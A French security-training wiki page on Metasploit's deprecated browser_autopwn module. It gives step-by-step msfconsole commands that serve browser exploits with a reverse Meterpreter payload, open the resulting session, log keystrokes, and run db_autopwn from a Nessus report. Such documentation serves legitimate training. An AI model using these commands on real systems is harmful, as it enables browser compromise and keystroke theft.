Browser autopwn

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Fiche express
Domaine Exploitation navigateur automatisée
Module auxiliary/server/browser_autopwn
Statut Déprécié
Contexte Metasploit
Voir aussi Aurora · Karmetasploit

Browser Autopwn automatise l'exploitation à partir de scans de sécurité : le module sert une page qui teste plusieurs exploits contre le navigateur qui s'y connecte. Il est déprécié car susceptible d'endommager les systèmes scannés.

Usage

msfconsole
search autopwn
use auxiliary/server/browser_autopwn
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.10.109
set URIPATH filetypes
exploit

La cible ouvre l'URL servie, puis on interagit avec la session obtenue :

# http://[adresse IP fournie]:8080
sessions -i 1
keyscan_start
keyscan_dump

Via la base et un rapport de scan

db_connect metasploit:toor@127.0.0.1/metasploitdb
db_import /tmp/nessus_report.nessus
db_autopwn -e -t -r -x -p

Voir aussi